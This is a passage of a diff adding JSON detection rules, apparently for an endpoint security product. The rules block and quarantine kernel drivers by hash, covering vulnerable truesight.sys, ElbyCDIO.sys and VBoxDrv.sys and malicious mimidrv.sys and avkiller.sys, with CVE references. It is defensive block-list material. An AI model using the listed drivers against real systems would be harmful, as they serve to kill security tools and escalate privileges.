+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ba4ac170deb3dcd0ece289932d02c637d2e5e2d59dae5f08c9f115e7416b0905",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a583ef46-b68f-56b8-aa83-71efa6f02bfb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473031Z",
+ "creation_date": "2026-03-23T11:45:31.473035Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473043Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6dfcd8e56c13bd0824c968f52d37f2d737ada3ddb158c8405202cb07e963eef5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a586ed20-1152-5cab-970f-9abca2b79dc5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972925Z",
+ "creation_date": "2026-03-23T11:45:29.972927Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972933Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2fbbc276737047cb9b3ba5396756d28c1737342d89dce1b64c23a9c4513ae445",
+ "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a58dccbd-e6b7-5a59-8b24-056946e3691b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813169Z",
+ "creation_date": "2026-03-23T11:45:31.813172Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813180Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7a651ebf69a83d8ef85cdbe17b5a0bee94d30d52646ad935ecc5241641d8af16",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a592fa98-89fe-5cca-9fe6-9c5fa046d225",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816524Z",
+ "creation_date": "2026-03-23T11:45:31.816527Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816535Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b7bf9a7577b10d3a5fa76272aaf3514c70f7a1273b2e3380524138cea2b478fd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a59ad06d-30f1-5586-89ff-1978cac2644f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145844Z",
+ "creation_date": "2026-03-23T11:45:32.145847Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145852Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b6cb163089f665c05d607a465f1b6272cdd5c949772ab9ce7227120cf61f971a",
+ "comment": "Malicious Kernel Driver (aka avkiller.sys) [https://www.loldrivers.io/drivers/7a9d34e4-c660-4388-ab61-4fd6f6bf1ad4/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a59baf5f-a9d0-528c-a9fb-6251e3a3c8e5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487144Z",
+ "creation_date": "2026-03-23T11:45:31.487146Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487152Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "465db36e6ebb2674c666028ae6a84d545c215c84db0934a830f152e84f147339",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a5a64c9d-9180-58eb-8a88-03903d4ed730",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609937Z",
+ "creation_date": "2026-03-23T11:45:29.609939Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609951Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "92ca1aec3afc90b44861c2e0be084a3db38d22d52f35e1697643d6477151392f",
+ "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a5a8e4af-2f4f-5999-b4cc-58e4cb54d464",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828955Z",
+ "creation_date": "2026-03-23T11:45:30.828957Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828963Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "668fb6e2568126a60f21bbe063e35ef824fdbcd7551cd32076181cda71727909",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a5ab5005-0036-5709-8267-13807e73416f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812783Z",
+ "creation_date": "2026-03-23T11:45:31.812787Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812796Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0f5e68a95d3c4d654cb4a66067506baaf66470ecb425fbf137bfa4b765e79da6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a5b568ca-d0ba-51a2-bf9a-731d7f6d4fbe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481518Z",
+ "creation_date": "2026-03-23T11:45:31.481522Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481532Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a200f489bb41c22e69eb1ef4fdedb0142aebad4b7be1c2f7bee9792fa7d217a5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a5cd8675-4a66-5df6-936d-6d86875bec1f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815327Z",
+ "creation_date": "2026-03-23T11:45:31.815330Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815336Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e37f93ceffb27551bf7d0af47a1ac1f4f371c2491bfe7b9160d83ccbf7432f65",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a5d8bc37-9e2d-5c7a-8941-ea6d86fd4ce9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465793Z",
+ "creation_date": "2026-03-23T11:45:30.465796Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465805Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eab9b5b7e5fab1c2d7d44cd28f13ae8bb083d9362d2b930d43354a3dfd38e05a",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a5defc21-5ca4-5d1b-ac53-04a75aa37e0b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611498Z",
+ "creation_date": "2026-03-23T11:45:29.611500Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611505Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1a8a5aebf83d1fa6daf74e48fc600e22b8fdceafb5dd7c7e14db2aa2a28e8c24",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a5e6b5cd-c77b-5317-85fc-46cc8ad01f8b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822190Z",
+ "creation_date": "2026-03-23T11:45:30.822192Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822198Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "91e5f702691772cd1291ffbd2b645f06fda3b7b2c31c04ca28a3f4d728875cc6",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a5ea2f7d-5bb2-557a-85ab-152c67b0097c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140113Z",
+ "creation_date": "2026-03-23T11:45:31.140115Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140121Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ffb44c5c528aebbe6ba2c3512b7b38dbf87dcc0ffb061b242e497fa0a8b157e2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a5f57bc7-f9bb-5b55-baee-7a8521a85039",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810973Z",
+ "creation_date": "2026-03-23T11:45:31.810975Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810980Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "07a4ae3cfafd52437c1c3080ab38139c4a194db4e67a31a9118d799f04e9d356",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a5fbcbf4-4648-5581-b1f7-d1b990b37ae6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973077Z",
+ "creation_date": "2026-03-23T11:45:29.973079Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973085Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f85eb576acb5db0d2f48e5f09a7244165a876fa1ca8697ebb773e4d7071d4439",
+ "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a6074328-30a6-57d9-a7a4-a961ff0b47c1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500496Z",
+ "creation_date": "2026-03-23T11:45:31.500499Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500507Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ed9948c70d70c1027251b6bd689d4145c6de042122348ebbecdf21bb6af6dbd4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a609325d-57d9-51cc-8fad-a5c70dca285a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979692Z",
+ "creation_date": "2026-03-23T11:45:29.979694Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979699Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "223b320fb86cd4a1019ce31ac6901ce6bc41792810bd995db232dad790398852",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a614b181-20ff-5986-946e-992942f51cb7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156108Z",
+ "creation_date": "2026-03-23T11:45:31.156110Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156116Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e5a56c97fe3b994d0c73c1551cfcabfbd2e4ee7ce3fda9bc4d76f18c49c57145",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a61ad8a9-664a-59ae-a1eb-e091f2275a2d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608814Z",
+ "creation_date": "2026-03-23T11:45:29.608815Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608821Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7dcd81140dc57d1d412c39940643ea923a1925815097f83788d840c1a7b57d25",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a6274886-f7fb-54eb-b526-75efc4de47b2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160257Z",
+ "creation_date": "2026-03-23T11:45:31.160259Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160264Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
